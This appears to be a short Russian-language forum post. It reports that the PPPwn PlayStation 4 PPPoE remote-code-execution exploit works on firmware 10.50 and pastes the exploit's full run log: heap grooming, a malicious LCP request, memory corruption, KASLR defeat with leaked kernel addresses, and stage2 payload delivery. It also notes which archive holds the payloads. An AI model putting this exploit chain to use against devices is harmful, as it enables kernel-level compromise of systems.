Работает на 10.50
Loading...[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=Ethernet fw=1050 stage1=exploit\stage1\stage1_1050.bin stage2=C:\Users\Dima\Desktop\pppwn\exploit\stage2\stage2_1050.bin
[+] STAGE 0: Initialization[*] Waiting for PADI...
[+] pppoe_softc: 0xffffdfc92ca81000
[+] Target MAC: 2c:cc:44:66:0e:0c
[+] Source MAC: 07:10:a8:2c:c9:df
[+] AC cookie length: 0x4e0[*] Sending PADO...[*] Waiting for PADR...[*] Sending PADS...[*] Sending LCP configure request...[*] Waiting for LCP configure ACK...[*] Waiting for LCP configure request...[*] Sending LCP configure ACK...[*] Sending IPCP configure request...[*] Waiting for IPCP configure ACK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure NAK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure ACK...[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2ecc:44ff:fe66:e0c[*] Heap grooming...0%[*] Heap grooming...6%[*] Heap grooming...12%[*] Heap grooming...18%[*] Heap grooming...25%[*] Heap grooming...31%[*] Heap grooming...37%[*] Heap grooming...43%[*] Heap grooming...50%[*] Heap grooming...56%[*] Heap grooming...62%[*] Heap grooming...68%[*] Heap grooming...75%[*] Heap grooming...81%[*] Heap grooming...87%[*] Heap grooming...93%
[+] Heap grooming...done
[+] STAGE 1: Memory corruption[*] Pinning to CPU 0...0%[*] Pinning to CPU 0...6%[*] Pinning to CPU 0...12%[*] Pinning to CPU 0...18%[*] Pinning to CPU 0...25%[*] Pinning to CPU 0...31%[*] Pinning to CPU 0...37%[*] Pinning to CPU 0...43%[*] Pinning to CPU 0...50%[*] Pinning to CPU 0...56%[*] Pinning to CPU 0...62%[*] Pinning to CPU 0...68%[*] Pinning to CPU 0...75%[*] Pinning to CPU 0...81%[*] Pinning to CPU 0...87%[*] Pinning to CPU 0...93%
[+] Pinning to CPU 0...done[*] Sending malicious LCP configure request...[*] Waiting for LCP configure reject...[*] Sending LCP configure request...[*] Waiting for LCP configure ACK...[*] Waiting for LCP configure request...[*] Sending LCP configure ACK...[*] Sending IPCP configure request...[*] Waiting for IPCP configure ACK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure NAK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0f1f:4141:4141:4141
[+] STAGE 2: KASLR defeat[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff96b414b8
[+] kaslr_offset: 0x126f0000
[+] STAGE 3: Remote code execution[*] Sending LCP terminate request...[*] Waiting for PADI...
[+] pppoe_softc: 0xffffdfc92ca81000
[+] Target MAC: 2c:cc:44:66:0e:0c
[+] Source MAC: 8d:cb:90:94:ff:ff
[+] AC cookie length: 0x514[*] Sending PADO...[*] Waiting for PADR...[*] Sending PADS...[*] Triggering code execution...[*] Waiting for stage1 to resume...[*] Sending PADT...[*] Waiting for PADI...
[+] pppoe_softc: 0xffffdfc92c97bc00
[+] Target MAC: 2c:cc:44:66:0e:0c
[+] AC cookie length: 0x0[*] Sending PADO...[*] Waiting for PADR...[*] Sending PADS...[*] Sending LCP configure request...[*] Waiting for LCP configure ACK...[*] Waiting for LCP configure request...[*] Sending LCP configure ACK...[*] Sending IPCP configure request...[*] Waiting for IPCP configure ACK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure NAK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure ACK...
[+] STAGE 4: Arbitrary payload execution[*] Sending stage2 payload...
[+] Done!
STAGE2.bin для вашей прошивки находится в архиве update.zip